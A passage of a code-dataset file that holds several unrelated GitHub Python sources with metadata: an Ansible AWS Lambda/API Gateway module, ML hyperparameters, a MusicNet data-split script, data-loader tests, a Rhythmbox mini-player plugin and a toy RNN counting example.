api = item\n break\n return api\n\n\ndef resource_exists(module, path, apiId, client):\n resource = None\n # response = client.get_resources(restApiId=apiId, limit=450 )['items']\n response = getAllResources(client, apiId)\n # comparing=[]\n for item in response:\n # comparing.append(\"%s == %s\"%(path,item['path']))\n if item['path'].lower() == path.lower():\n resource = item\n break\n # module.fail_json(msg=\"[E] resource_exists API resource[{0}] - {1} \".format(resource, comparing ))\n return resource\n\n\ndef method_exists(module, method, apiId, rId, client):\n oMethod = None\n resource = client.get_resource(restApiId=apiId, resourceId=rId)\n if 'resourceMethods' in resource:\n for key, value in resource['resourceMethods'].items():\n if method.lower() == key.lower():\n # module.fail_json(msg=\"[E] method_exists API resource[{0}] - {1} \".format(key, resource ))\n oMethod = client.get_method(restApiId=apiId, resourceId=rId, httpMethod=key)\n del oMethod['ResponseMetadata']\n break\n # module.fail_json(msg=\"[T] method_exists API resource[{0}] {1}\".format( method, oMethod))\n return oMethod\n\n\ndef getAll_validators(client, restApiId, position=None):\n rlist = []\n if position is None:\n response = client.get_request_validators(restApiId=restApiId, limit=500)\n else:\n response = client.get_request_validators(restApiId=restApiId, limit=500, position=position)\n baseList = response['items']\n if \"position\" in response:\n rlist = getAll_validators(client, response['position'], prevlist=[])\n final = baseList + rlist\n return final\n\n\ndef validator_match(client, module, validator, restApiId):\n description = validator['name']\n validBody = validator['validateRequestBody']\n validReqParam = validator['validateRequestParameters']\n items = getAll_validators(client, restApiId)\n # module.fail_json(msg=\"[T] validator_match - {0} [{1}] {2}\".format( items, restApiId , validator))\n Found = None\n if items:\n for item in items:\n if validBody == item['validateRequestBody'] and validReqParam == item['validateRequestParameters'] and description == item['name']:\n return item\n response = client.create_request_validator(restApiId=restApiId,\n name=description,\n validateRequestBody=validBody,\n validateRequestParameters=validReqParam\n )\n return response\n\n\ndef getAll_authorizers(client, restApiId, position=None):\n rlist = []\n if position is None:\n response = client.get_authorizers(restApiId=restApiId, limit=500)\n else:\n response = client.get_authorizers(restApiId=restApiId, limit=500, position=position)\n baseList = response['items']\n if \"position\" in response:\n rlist = getAll_authorizers(client, response['position'], prevlist=[])\n final = baseList + rlist\n return final\n\n\ndef auth_present(client, module, authorizationName, restApiId):\n # items = client.get_authorizers(restApiId=restApiId)['items']\n items = getAll_authorizers(client, restApiId)\n for item in items:\n if authorizationName == item['name']:\n return item\n # module.fail_json(msg=\"[T] auth_present - {0} [{1}]\".format( items, restApiId ))\n # not found so fail\n return None\n\n\ndef model_present(client, module, model, apiId, update=True):\n old = None\n if model is None or not model:\n return old\n for mk, mv in model.items():\n if mv:\n if mv.lower() == \"empty\":\n return old\n\n modelName = None\n if 'name' in model:\n modelName = model['name']\n # module.fail_json(msg=\"[T] model_present models >>-> {0} \".format( model ) )\n if modelName is None:\n return None\n try:\n old = client.get_model(restApiId=apiId, modelName=modelName, flatten=True)\n if not old['schema'] in model['schema']:\n update = True\n else:\n nModel = old\n except ClientError as e:\n update = True\n if update:\n try:\n if not old is None:\n client.delete_model(restApiId=apiId, modelName=modelName)\n response = client.create_model(restApiId=apiId, name=modelName,\n description=model['description'],\n schema=model['schema'], contentType=model['contentType']\n )\n nModel = response\n except ClientError as e:\n module.fail_json(msg=\"[E] model_present failed - {0}\".format(e.response['Error']['Message']))\n return nModel\n\n\ndef cr_model(state, module, client, name, resource, description, apiId, schema, contentType):\n pName = name\n found = True\n try:\n obj = {'schema': schema, 'name': name, 'description': description, 'contentType': contentType}\n nModel = model_present(client, module, obj, apiId, True)\n found = False\n except ClientError as e:\n module.fail_json(msg=\"[E] model_present failed - {0}\".format(e.response['Error']['Message']))\n\n return [pName], False if found else True\n# isTest is not for Testing but to validate params are correct before CHANGE is made!!!!!\n# OTHERWISE YOU WILL LOOSE THE API FOREVER!!!!\n\n\ndef object_Method(name, description, httpMethod, integration, response, path, keyRequired, requestparameters, requestvalidator, authorizationType, authorizationName, requestModels, responseModels, operationName, authScopes, credentials):\n return type('obj', (object,), {\n \"name\": name,\n \"description\": description,\n \"httpMethod\": httpMethod,\n \"integration\": integration,\n \"response\": response,\n \"path\": path,\n \"keyRequired\": keyRequired,\n \"requestparameters\": requestparameters,\n \"requestvalidator\": requestvalidator,\n \"authorizationType\": authorizationType,\n \"authorizationName\": authorizationName,\n \"requestModels\": requestModels,\n \"responseModels\": responseModels,\n \"operationName\": operationName,\n \"authScopes\": authScopes,\n \"credentials\": credentials\n })\n\n\n# GET RESOURCE\n\n# CREATE RESOURCE\n# CREATE METHOD\n# CREATE USAGE PLAN\n# CREATE AUTHORIZER\n# CREATE DEPLOYMENT\n# CREATE MODEL\n# CREATE REQUEST VALIDATOR\n\n# . create_base_path_mapping\n\n# update_gateway_response()\n# update_integration()\n# update_integration_response()\n# update_method()\n# update_method_response()\n\n# ADD METHOD. put_method\n\n# WHAT LIMITS ARE ON TOTAL NUMBER OF STAGES\n# CREATE STAGE. (*CREATE ONLY ONE annd multiple usage plans PER customer)\n# CREATE API KEY (*requires stage to be deployed)\n\n# UPDATE AUTHORIZOR\n\n# TEST INVOKE METHOD\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n argument_spec.update(dict(\n # name=dict(required=True, default=None), # name of the API\n # apigw_type=dict(required=True, choices=['resource', 'method', 'method_response', 'integration', 'integration_response', 'model']),\n state=dict(required=True, choices=['present', 'absent']),\n # type_event=dict(required=True, choices=['s3', 'dynamodb', 'api', 'cloudwatch', 'sns', 'sqs', 'cloudfont', 'cognito', 'kinesis']),\n # description=dict(default=None, required=False),\n # api_key=dict(required=False, default=None, type='bool'),#Specifies whether the ApiKey can be used by callers\n # #########################\n # CREATE RESOURCE\n # #########################\n event_source=dict(required=True, default=None, type='str'),\n function_name=dict(required=True, default=None, type='str'),\n\n # stages=dict(default=None, required=False),\n source_params=dict(default=None, required=True, type='dict')\n\n\n )\n )\n\n module = AnsibleModule(argument_spec=argument_spec,\n supports_check_mode=True,\n mutually_exclusive=[], required_together=[]\n )\n\n # validate dependencies\n if not HAS_BOTO3:\n module.fail_json(msg='boto3 is required for this module.')\n try:\n region, endpoint, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)\n aws_connect_kwargs.update(dict(region=region,\n endpoint=endpoint,\n conn_type='client',\n resource='lambda'\n ))\n\n resource = None\n # ecr = boto3_conn(module, conn_type='client', resource='ecr', region=region, endpoint=endpoint, **aws_connect_kwargs)\n # module.fail_json(msg=\" LOL cr_iam_profileo - {0}\".format('iprofile'))\n client = boto3_conn(module, **aws_connect_kwargs)\n aws_connect_kwargs.update(dict(region=region,\n endpoint=endpoint,\n conn_type='client',\n resource='dynamodbstreams'\n ))\n dynamodbstreams = boto3_conn(module, **aws_connect_kwargs)\n # resource=None\n # module.fail_json(msg=\" LOL cr_iam_profileo - {0}\".format('iprofile'))\n except botocore.exceptions.ClientError as e:\n module.fail_json(msg=\"Can't authorize connection - {0}\".format(e))\n except Exception as e:\n module.fail_json(msg=\"Connection Error - {0}\".format(e))\n# check if trust_policy is present -- it can be inline JSON or a file path to a JSON file\n\n state = module.params.get('state')\n type_event = module.params.get('type_event')\n event_source = module.params.get('event_source')\n if \":table/\" in event_source:\n type_event = 'dynamodb'\n\n # path = module.params.get('path').lower()\n function_name = module.params.get('function_name')\n source_params = module.params.get('source_params')\n\n choice_map = {\n \"dynamodb\": cr_dynamo_event,\n \"s3\": cr_dynamo_event,\n \"cloudwatch\": cr_dynamo_event\n }\n# [api','resource','method','method_response','integration','integration_response','stage','deployment','key','authorizer','model']\n # module.fail_json(msg=\"what is name - {0}\".format(name))\n\n if 'dynamodb' in type_event: # ** \"name\" ** is API name. (each env may have diff id)\n typeList, changed = choice_map.get(type_event)(state, module, client, dynamodbstreams, event_source, function_name, source_params)\n else:\n module.fail_json(msg=\"Sorry {0} not yet implemented\".format(delta_type))\n # typeList, changed = choice_map.get(delta_type)(module, client, name, trust_policy_doc, iam_role)\n\n # has_changed, result = choice_map.get(module.params['state'])(module.params)\n has_changed = changed\n\n module.exit_json(changed=has_changed, entities=typeList)\n\n\n# ansible import module(s) kept at ~eof as recommended\n\nfrom ansible.module_utils.basic import *\nfrom ansible.module_utils.ec2 import *\n\nif __name__ == '__main__':\n main()\n","repo_name":"brandonkgarner/CEDAR","sub_path":"ansible/library/cr_lambda_triggers.py","file_name":"cr_lambda_triggers.py","file_ext":"py","file_size_in_byte":26707,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"15420219746","text":"import tensorflow as tf\nimport constants.constants as const\n\n# words2vec\nW2V_EMBEDDING_SIZE = 128\nW2V_NEG_SAMPLES = 64\nW2V_SKIP_WORD_WINDOW = 1\nW2V_BATCH_SIZE = 100\nW2V_EPOCHS = 500\nW2V_EVAL_FRQ = 2\n\n\n# vid2sentence\n# data set params\nV2S_SENTENCE_MAX = 20\nV2S_FRAMES_MAX = 26\nV2S_MAX_HEIGHT = 128\nV2S_MAX_WIDTH = 128\nV2S_TFR_EX_NUM = 10000\nFRAME_SHAPE = (V2S_MAX_HEIGHT, V2S_MAX_WIDTH, 3)\n# optional, will be set automaticallyQ\nCNN_MODEL_SHAPE = (6, 6, 1536)\nV2S_BFLOAT16_MODE = False\n\n# hyper params\nV2S_BATCH_SIZE = 2\nV2S_EPOCHS_PER_EVAL = 1\nV2S_DROPOUT_RATE = 0.1\nV2S_LAYERS = 6\nV2S_NUM_MULT_HEADS = 8\nV2S_FF_HIDDEN_UNITS = 1024\nV2S_ACTIVATION = tf.nn.selu\n\n# optimizer params\nV2S_LBL_SMOOTHING = 0.1\nV2S_WEIGHT_MODE = const.WeightMode.Gauss\nV2S_OPTIMIZER_TYPE = const.OptimizerType.Adam\n\n# optimizer params - adam\nV2S_ADAM_BETA1 = 0.9\nV2S_ADAM_BETA2 = 0.999\nV2S_ADAM_EPSILON = 1e-08\n\n# optimizer params - adafactor\nV2S_ADAFACTOR_DECAY = None\nV2S_ADAFACTOR_BETA = 0.0\nV2S_ADAFACTOR_EPSILON1 = 1e-30\nV2S_ADAFACTOR_EPSILON2 = 1e-3\n\n# eval metric params\nV2S_MAX_N_GRAM = 4\n\n# early stopping params\nV2S_DELTA_VAL = 0.0001\nV2S_DELTA_STEP = 1300\nV2S_MIN_STEP = 0\n\n# tpu params\n# Number of training steps to run on the Cloud TPU before returning control.\nTPU_ITERATIONS = 100\n# A single Cloud TPU has 8 shards.\nTPU_NUM_SHARDS = 8\nTPU_ZONE = \"\"\nTPU_GCP_NAME = \"\"\nTPU_NAME = \"\"\nTPU_LOG_STEP = 1\nTPU_TRAIN_EXAMPLES_PER_EPOCH = 80000\nTPU_EVAL_EXAMPLES_PER_EPOCH = 6912\nTPU_TRAIN_BATCH_SIZE = 128 # 16\nTPU_EVAL_BATCH_SIZE = 128\nTPU_PREDICT_BATCH_SIZE = 128\nTPU_EPOCHS = 2\n\n# Jpg encoding\nJPG_SKIP = 10\nJPG_QUAL = 60\n\n# data pipeline\nPREFETCH_ELEMENTS = 1\nPARSER_PARALLEL_CALLS = 8\n\n# checkpoints\nSAVE_CHK_STEP = 500\nKEEP_CHK = 10\n\n# optical flow\nBRACKET = 5\nSKIP = 1\nBOUND = 15\nFLOW_RESIZE_FACTOR = 2 # needs to be 2^x\n\n# beam search\nALPHA = 0.6\n","repo_name":"MFizz/MultiheadAttentionConvHybrid","sub_path":"constants/hyper_params.py","file_name":"hyper_params.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"21224322530","text":"#ITP1_1_D: Watch\r\n#秒単位の時間 S が与えられるので、h:m:s の形式へ変換して出力してください。\r\n#ここで、h は時間、m は 60 未満の分、s は 60 未満の秒とします。\r\n#Write a program which reads an integer S [second] and converts it to h:m:s where h, m, s denote hours, minutes (less than 60) and seconds (less than 60) respectively.\r\nS = int(input())\r\nh = S // 3600\r\nm = S % 3600 // 60\r\ns = S % 60\r\nif(0<=S & S<=86400):\r\n print(f\"{h}:{m}:{s}\")\r\n","repo_name":"nerunerunerune/kenkyushitukadai","sub_path":"04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"8269303981","text":"from sklearn.model_selection import train_test_split\n\nfrom pymir import settings\n\nfrom pymir.common import EXISTING_KEYS\n\n\nimport csv\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n\ndef generate_ds(test_fname, train_fname, test_size=0.2):\n\n musicnet_fname = (\n os.path.join(\n settings.DATA_DIR, 'musicnet', 'representations',\n 'sequence_of_notes', 'musicnet.csv'))\n\n songs = {}\n i = 0\n with open(musicnet_fname) as f:\n reader = csv.reader(f, delimiter=' ')\n for row in reader:\n if row[0] not in songs:\n songs[row[0]] = [row]\n else:\n songs[row[0]].append(row)\n i += 1\n\n train_list = []\n test_list = []\n\n for k in EXISTING_KEYS:\n if k in songs:\n df = pd.Series(songs[k])\n train, test = train_test_split(df, test_size=test_size)\n train_list.append(train)\n test_list.append(test)\n\n train = pd.concat(train_list)\n test = pd.concat(test_list)\n\n\n # generate train and test sets, first note in every line is key of the song\n\n with open(test_fname, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=' ')\n for a in test:\n writer.writerow(a)\n\n\n with open(train_fname, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=' ')\n for a in train:\n writer.writerow(a)\n\ndef plot_train_test_data(test_fname, train_fname):\n test_keys = {}\n train_keys = {}\n\n with open(test_fname, 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=' ')\n for row in reader:\n if row[0] in test_keys:\n test_keys[row[0]] +=1\n else:\n test_keys[row[0]] =1\n\n\n with open(train_fname, 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=' ')\n for row in reader:\n if row[0] in train_keys:\n train_keys[row[0]] +=1\n else:\n train_keys[row[0]] =1\n\n test_keys_list = [\n test_keys[k] if k in test_keys else 0 for k in EXISTING_KEYS\n ]\n\n train_keys_list = [\n train_keys[k] if k in train_keys else 0 for k in EXISTING_KEYS\n ]\n\n ind = np.arange(len(EXISTING_KEYS)) # the x locations for the groups\n width = 0.35 # the width of the bars\n\n fig, ax = plt.subplots()\n train = ax.bar(ind, train_keys_list, width, color='r')\n test = ax.bar(ind + width, test_keys_list, width, color='y')\n\n # add some text for labels, title and axes ticks\n ax.set_ylabel('Frequency')\n ax.set_title('Keys frequency by set')\n ax.set_xticks(ind + width / 2)\n ax.set_xticklabels(EXISTING_KEYS, rotation=60)\n\n ax.legend((train[0], test[0]), ('Train Set', 'Test Set'))\n\n fname = (\n os.path.join(\n settings.IMG_DIR,\n 'key_detection', 'musicnet', 'train_test_keys_distribution.png'))\n\n ax.set_xticks(ind + width)\n plt.tight_layout()\n plt.savefig(fname)\n\ndef plot_ds_duration_by_song(test_fname, train_fname):\n durations = []\n\n with open(test_fname, 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=' ')\n for row in reader:\n durations.append(len(row) - 1)\n\n with open(train_fname, 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=' ')\n for row in reader:\n durations.append(len(row) - 1)\n\n\n # the histogram of the data\n n, bins, patches = plt.hist(durations, 50, normed=0, facecolor='green', alpha=0.75)\n plt.grid(True)\n plt.xlabel('Songs')\n plt.ylabel('Probability')\n fname = (\n os.path.join(\n settings.IMG_DIR,\n 'key_detection', 'musicnet', 'sequence_len.png'))\n plt.tight_layout()\n plt.savefig(fname)\n\n\n\ndef compute(train_size=0.8):\n \"\"\"\n Splits musicnet dataset into train and test sets\n \"\"\"\n test_size = 1 - train_size\n\n test_fname = (\n os.path.join(settings.DATA_DIR, 'musicnet', 'representations',\n 'sequence_of_notes', 'musicnet_test.csv'))\n\n train_fname = (\n os.path.join(settings.DATA_DIR, 'musicnet', 'representations',\n 'sequence_of_notes', 'musicnet_train.csv'))\n\n generate_ds(test_fname, train_fname, test_size=test_size)\n plot_train_test_data(test_fname, train_fname)\n plot_ds_duration_by_song(test_fname, train_fname)\n","repo_name":"mfranco/pymir","sub_path":"code/python/pymir/analytics/key_detection/musicnet/transformations/note_sequence_split.py","file_name":"note_sequence_split.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"72140284385","text":"\"\"\"Test training function data loaders.\"\"\"\n\n\nfrom warnings import warn\n\nimport torch\n\nfrom .runner_test import training_fn_on_device\n\n\ndef test_is_cuda_device_cpu():\n \"\"\"Test whether device is recognized as CPU.\"\"\"\n training = training_fn_on_device(use_gpu=False)()\n assert not training.is_device_cuda()\n\n\ndef test_is_cuda_device_gpu():\n \"\"\"Test whether device is recognized as CPU.\"\"\"\n if torch.cuda.is_available():\n training = training_fn_on_device(use_gpu=True)()\n assert training.is_device_cuda()\n else:\n warn(\"Could not find CUDA device\")\n\n\ndef test_pin_memory_in_data_loading_cpu():\n \"\"\"When training on CPU, data loaders need not use pinned memory.\"\"\"\n training = training_fn_on_device(use_gpu=False)()\n for loader in [\n training.load_test_set,\n training.load_training_set,\n training.load_training_loss_set,\n ]:\n assert not loader().pin_memory\n\n\ndef test_pin_memory_in_data_loading_gpu():\n \"\"\"When training on GPU, data loaders should use pinned memory.\"\"\"\n if torch.cuda.is_available():\n training = training_fn_on_device(use_gpu=True)()\n for loader in [\n training.load_test_set,\n training.load_training_set,\n training.load_training_loss_set,\n ]:\n assert loader().pin_memory\n else:\n warn(\"Could not find CUDA device\")\n","repo_name":"f-dangel/hbp","sub_path":"exp/training/training_test.py","file_name":"training_test.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"70"}
+{"seq_id":"30576739612","text":"from gi.repository import GObject\nfrom gi.repository import Gdk\nfrom gi.repository import GdkPixbuf\nfrom gi.repository import Gtk\nfrom gi.repository import Peas\nfrom gi.repository import RB\nfrom gi.repository import GLib\n\nfrom small_rb3compat import ActionGroup\nfrom small_rb3compat import Action\nfrom small_rb3compat import ApplicationShell\nfrom small_rb3compat import is_rb3\nimport rb\n\n\nui_string = \\\n \"\"\"\n \n \n \n \n \n \n \n \"\"\"\n\n\nclass SmallWindow(GObject.Object, Peas.Activatable):\n object = GObject.Property(type=GObject.Object)\n\n # Builder releated utility functions... ####################################\n\n def load_builder_content(self, builder):\n if ( not hasattr(self, \"__builder_obj_names\") ):\n self.__builder_obj_names = list()\n\n for obj in builder.get_objects():\n if ( isinstance(obj, Gtk.Buildable) ):\n name = Gtk.Buildable.get_name(obj).replace(' ', '_')\n self.__dict__[name] = obj\n self.__builder_obj_names.append(name)\n\n def connect_builder_content(self, builder):\n builder.connect_signals_full(self.connect_builder_content_func, self)\n\n def connect_builder_content_func(self,\n builder,\n object,\n sig_name,\n handler_name,\n conn_object,\n flags,\n target):\n handler = None\n\n h_name_internal = \"_sh_\" + handler_name.replace(\" \", \"_\")\n\n if ( hasattr(target, h_name_internal) ):\n handler = getattr(target, h_name_internal)\n else:\n handler = eval(handler_name)\n\n object.connect(sig_name, handler)\n\n def purge_builder_content(self):\n for name in self.__builder_obj_names:\n o = self.__dict__[name]\n if ( isinstance(o, Gtk.Widget) ):\n o.destroy()\n del self.__dict__[name]\n\n del self.__builder_obj_names\n\n # Plugins Methods... #######################################################\n\n def __init__(self):\n super(SmallWindow, self).__init__()\n\n def do_activate(self):\n # Basic Activation Procedure\n self.shell = self.object\n self.main_window = self.shell.props.window\n\n # Prepare internal variables\n self.song_duration = 0\n self.cover_pixbuf = None\n self.entry = None\n\n # Prepare Album Art Displaying\n self.album_art_db = GObject.new(RB.ExtDB, name=\"album-art\")\n\n # Build up actions.\n self.action_group = ActionGroup(self.shell, 'small window actions')\n action = self.action_group.add_action(\n func=self.small_window_action,\n action_name='SmallWindow',\n label='Small Window',\n action_type='app')\n\n self._appshell = ApplicationShell(self.shell)\n self._appshell.insert_action_group(self.action_group)\n self._appshell.add_app_menuitems(ui_string, 'small window actions')\n\n # Build up small window interface\n builder = Gtk.Builder()\n if is_rb3():\n builder.add_from_file(rb.find_plugin_file(self, \"interface_rb3.ui\"))\n else:\n builder.add_from_file(rb.find_plugin_file(self, \"interface_rb2.ui\"))\n self.load_builder_content(builder)\n self.connect_builder_content(builder)\n restore = builder.get_object('restore button')\n restore.connect('clicked', self.main_window_action)\n\n # Prepare windows\n for sub_widget in self.small_window:\n sub_widget.show_all()\n\n geometry = Gdk.Geometry()\n\n geometry.min_width = 300\n geometry.max_width = 5120\n geometry.min_height = -1\n geometry.max_height = -1\n\n self.small_window.set_geometry_hints(self.small_window,\n geometry,\n Gdk.WindowHints.MIN_SIZE | Gdk.WindowHints.MAX_SIZE)\n\n if is_rb3():\n self.shell.props.application.add_window(self.small_window)\n # Bring Builtin Actions to plugin\n for (a, b) in ((self.play_button, \"play\"),\n (self.prev_button, \"play-previous\"),\n (self.next_button, \"play-next\"),\n (self.repeat_toggle, \"play-repeat\"),\n (self.shuffle_toggle, \"play-shuffle\")):\n a.set_action_name(\"app.\" + b)\n #if b == \"play-repeat\" or b == \"play-shuffle\":\n # a.set_action_target_value(GLib.Variant(\"b\", True))\n else:\n # Bring Builtin Actions to plugin\n for (a, b) in ((self.play_button, \"ControlPlay\"),\n (self.prev_button, \"ControlPrevious\"),\n (self.next_button, \"ControlNext\"),\n (self.repeat_toggle, \"ControlRepeat\"),\n (self.shuffle_toggle, \"ControlShuffle\")):\n a.set_related_action(self._appshell.lookup_action(\"MainActions\", b).action)\n\n # Bind needed properites.\n self.bind_title = GObject.Binding(source=self.main_window,\n source_property=\"title\",\n target=self.small_window,\n target_property=\"title\",\n flags=GObject.BindingFlags.DEFAULT)\n\n # Connect signal handlers to rhythmbox\n self.shell_player = self.shell.props.shell_player\n self.sh_psc = self.shell_player.connect(\"playing-song-changed\",\n self._sh_on_song_change)\n\n self.sh_op = self.shell_player.connect(\"elapsed-changed\",\n self._sh_on_playing)\n\n def do_deactivate(self):\n self.shell_player.disconnect(self.sh_op)\n self.shell_player.disconnect(self.sh_psc)\n del self.shell_player\n\n del self.bind_title\n self._appshell.cleanup()\n del self.album_art_db\n\n self.purge_builder_content()\n\n del self.main_window\n del self.shell\n\n # Controlling Functions ####################################################\n\n def display_song(self, entry):\n self.entry = entry\n\n self.cover_pixbuf = None\n self.album_cover.clear()\n\n if ( entry is None ):\n self.song_button_label.set_text(\"\")\n\n else:\n self.song_button_label.set_markup(\n \"{title} {album} - {artist} \".format(\n title=entry.get_string(RB.RhythmDBPropType.TITLE),\n album=entry.get_string(RB.RhythmDBPropType.ALBUM),\n artist=entry.get_string(RB.RhythmDBPropType.ARTIST)))\n\n key = entry.create_ext_db_key(RB.RhythmDBPropType.ALBUM)\n self.album_art_db.request(key,\n self.display_song_album_art_callback,\n entry)\n\n def display_song_album_art_callback(self, key, filename, data, entry):\n if ( ( data is not None ) and ( isinstance(data, GdkPixbuf.Pixbuf) ) ):\n self.cover_pixbuf = data\n scale_cover = self.cover_pixbuf.scale_simple(24, 24,\n GdkPixbuf.InterpType.HYPER)\n\n self.album_cover.set_from_pixbuf(scale_cover)\n else:\n self.cover_pixbuf = None\n self.album_cover.clear()\n\n # Signal Handlers ##########################################################\n\n def small_window_action(self, *args):\n self.main_window.hide()\n self.small_window.show()\n\n def main_window_action(self, *args):\n self.small_window.hide()\n self.main_window.show()\n\n def _sh_small_window_on_close(self, window, asdf):\n self.shell.quit()\n\n def _sh_on_song_change(self, player, entry):\n if ( entry is not None ):\n self.song_duration = entry.get_ulong(RB.RhythmDBPropType.DURATION)\n else:\n self.song_duration = 0\n self.display_song(entry)\n\n def _sh_on_playing(self, player, second):\n if ( self.song_duration != 0 ):\n self.song_progress.progress = float(second) / self.song_duration\n\n def _sh_progress_control(self, progress, fraction):\n if ( self.song_duration != 0 ):\n self.shell_player.set_playing_time(self.song_duration * fraction)\n\n def _sh_bigger_cover(self, cover, x, y, key, tooltip):\n if ( self.cover_pixbuf is not None ):\n tooltip.set_icon(self.cover_pixbuf.scale_simple(300, 300,\n GdkPixbuf.InterpType.HYPER))\n return True\n else:\n return False\n\n\n# ###############################################################################\n# Custom Widgets ###############################################################\n\nclass SmallProgressBar(Gtk.DrawingArea):\n __gsignals__ = {\n \"control\": (GObject.SIGNAL_RUN_LAST, None, (float,))\n }\n\n @GObject.Property\n def progress(self):\n return self.__progress__\n\n @progress.setter\n def progress(self, value):\n self.__progress__ = value\n self.queue_draw()\n\n def __init__(self):\n super(SmallProgressBar, self).__init__()\n self.add_events(Gdk.EventMask.POINTER_MOTION_MASK |\n Gdk.EventMask.BUTTON_PRESS_MASK |\n Gdk.EventMask.BUTTON_RELEASE_MASK)\n self.button_pressed = False\n self.button_time = 0\n self.__progress__ = 0\n\n def do_draw(self, cc):\n alloc = self.get_allocation()\n sc = self.get_style_context()\n fgc = sc.get_color(self.get_state_flags())\n\n cc.set_source_rgba(1, 1, 1, 1)\n cc.rectangle(0, 0, alloc.width, alloc.height)\n cc.fill()\n\n cc.set_source_rgba(fgc.red, fgc.green, fgc.blue, fgc.alpha)\n cc.rectangle(0, 0, alloc.width * self.progress, alloc.height)\n cc.fill()\n\n def do_motion_notify_event(self, event):\n if ( self.button_pressed ):\n self.control_by_event(event)\n return True\n else:\n return False\n\n def do_button_press_event(self, event):\n self.button_pressed = True\n self.control_by_event(event)\n return True\n\n def do_button_release_event(self, event):\n self.button_pressed = False\n self.control_by_event(event)\n return True\n\n def control_by_event(self, event):\n allocw = self.get_allocated_width()\n fraction = event.x / allocw\n if ( self.button_time + 100 < event.time ):\n self.button_time = event.time\n self.emit(\"control\", fraction)\n","repo_name":"fossfreedom/smallwindow","sub_path":"smallwindow.py","file_name":"smallwindow.py","file_ext":"py","file_size_in_byte":11229,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"3010542198","text":"#!/usr/bin/env python3\n# 2020-05-01\n# based on:\n# https://peterroelants.github.io/posts/rnn-implementation-part01/\n\n# the model as one recurrent weight and one input weight\n# the input is a sequence of ones and zeros\n# we want to count the ones\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Settings\nalpha=0.1 # learning rate\ndeltax=0.01 # initial weight-change amount\ndeltar=0.01 # initial weight-change amount\nnp.random.seed(42)\n\n# data\nns=40 # number of sequences\nnps=5 # number of elements in one sequence\nx=(np.round(np.random.rand(ns*nps)).astype(int)).reshape((ns,nps))\ny=np.sum(x,axis=1)\n\n# for this example, weights are each just a 1x1 matrix\nwr=0.1 # recurrent weight\nwx=0.8 # input-weight\nh0=0. # initial value of the 1x1 matrix of neurons\n#wx=1. ;wr=1. # cheating to get perfect model\n# if I set the initial weights to the same value, they will converge to the perfect solution\n# if the initial values are unqeual, the model doesnt find the perfect weights\n\ndef fprop(x,h0,wr,wx):\n # forward propagation\n # x is here just one sequence with nps elements\n nps=len(x)\n hs=np.zeros(nps) # all the states the network takes during this sequence\n for ll in range(nps):\n if ll==0: prevh=h0\n else: prevh=hs[ll-1]\n hs[ll]= prevh*wr + x[ll]*wx\n return hs\n\nne=100\nsignx0=1.0 # initialize previous sign\nsignr0=1.0\nMSE=np.zeros(ne)\nfor ee in range(ne): # training epochs\n # run thru the data set and compute the error\n dmsedyhat=0. # initialize gradient of mean squared error w.r.t. yhat\n for ii in range(ns): # for all sample sequences\n hs=fprop(x[ii,:],h0,wr,wx)\n yhat=hs[-1] # prediction is the last state\n #yhat=np.round(hs[-1]) # round to integer, as we're counting integers\n MSE[ee]+=(1./ns)*(yhat-y[ii])**2.\n dmsedyhat+= (1./ns)*2.0*(yhat-y[ii])\n print('epoch=%i MSE=%.8f' %(ee,MSE[ee])) \n\n # propagate the error backwards\n dwx=0.; dwr=0.\n # no need to randomize order of samples, because the batchsize==samplesize\n # i.e. we run thru the whole data set before updating weights anyways, no matter the order\n for ii in range(ns): # all samples\n e=dmsedyhat # for the very last state, the error is dMSE/dyhat\n for ll in range(nps-1,-1,-1):\n if ll==0: prevh=h0\n else: prevh=hs[ll-1]\n dwx += (1./ns)*e*x[ii,ll] # change in wx, i.e. dwx= e[ll]*x[ll]\n dwr += (1./ns)*e*prevh # change in wr, i.e. dwr= e[ll]*hs[ll-1]\n e*= wr # prepare error for next step back, e[ll-1] = e*wr\n print('epoch=%i Would change weights: dwr=%.6f, dwx=%.6f' %(ee,dwr,dwx))\n if np.abs(dwx)>0.: # i.e. dont check, always clip weight-changes\n signx=np.sign(dwx)\n dwx = signx*deltax # clip\n if signx != signx0:\n deltax *= 0.5 # sign changed\n else:\n deltax *= 1.2 # sign didnt change\n signx0=signx\n if np.abs(dwr)>0.: # i.e. dont check, always clip weight-changes\n signr=np.sign(dwr)\n dwr = signr*deltar # clip\n if signr != signr0:\n deltar *= 0.5 # sign changed .. if this is larger, result is the same but a bit less stable\n else:\n deltar *= 1.2 # sign didnt change\n signr0=signr\n print('epoch=%i Will change weights: dwr=%.6f, dwx=%.6f' %(ee,dwr,dwx))\n wx-=alpha*dwx; wr-=alpha*dwr; # update weights\n\nprint('Final weights wr=%f, wx=%f' %(wr,wx))\nprint('Testing on final model:')\nfor ii in range(ns): # for all sample sequences\n hs=fprop(x[ii,:],h0,wr,wx)\n yhat=np.round(hs[-1]) # round to integer, as we're counting integers\n if yhat==y[ii]:\n res='Good!'\n else:\n res='Miscounted.'\n print('Sample %04i: prediction=%i, true value = %i ' %(ii,yhat,y[ii]) + res)\n\n# plot convergence\nplt.figure()\nplt.plot(np.arange(ne)+1,MSE,'k-')\nplt.xlabel('epochs')\nplt.ylabel('mean squared 